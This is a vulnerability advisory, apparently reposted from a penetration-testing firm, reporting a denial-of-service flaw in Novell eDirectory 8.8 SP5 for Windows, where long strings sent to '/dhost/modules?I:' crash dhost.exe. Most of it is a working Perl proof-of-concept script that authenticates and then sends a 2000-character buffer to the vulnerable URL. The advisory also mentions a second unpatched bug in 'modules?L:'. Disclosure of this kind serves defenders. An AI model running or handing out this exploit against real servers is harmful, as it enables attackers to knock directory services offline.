Product:

Novell eDirectory 8.8 sp5 for Windows

************************************************************************
********

Vulnerability:

Denial of Service

************************************************************************
********

Discussion:

Vulnerability in '/dhost/modules?I:'

Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)

Also in last weeks published another bug in 'modules?L:'

It is not patched yet too..

************************************************************************
********

Credits:

HACKATTACK IT SECURITY GmbH

Penetration Testing in Deutschland - Österreich - Schweiz

www.hackattack.com

************************************************************************
********

Original Advisory

www.hackattack.com

************************************************************************
********

PoC:

#!usr\bin\perl

#Vulnerability has found by HACKATTACK

use WWW::Mechanize;

use LWP::Debug qw(+);

use HTTP::Cookies;

$address=$ARGV[0];

if(!$ARGV[0]){

print "Usage:perl $0 address\n";

exit();

}

$login = "$address/_LOGIN_SERVER_";

$url = "$address/dhost/";

$module = "modules?I:";

$buffer = "A" x 2000;

$vuln = $module.$buffer;

#Edit the username and password.

$user = "username";

$pass = "password";

#Edit the username and password.

my $mechanize = WWW::Mechanize->new();

$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));

$mechanize->timeout($url_timeout);

$res = $mechanize->request(HTTP::Request->new('GET', "$login"));

$mechanize->submit_form(

form_name => "authenticator",

fields => {

usr => $user,

pwd => $pass},

button => 'Login');

$response2 = $mechanize->get("$url$vuln");

About HACKATTACK

================

HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria

More Information about HACKATTACK at

http://www.hackattack.com

[ reply ]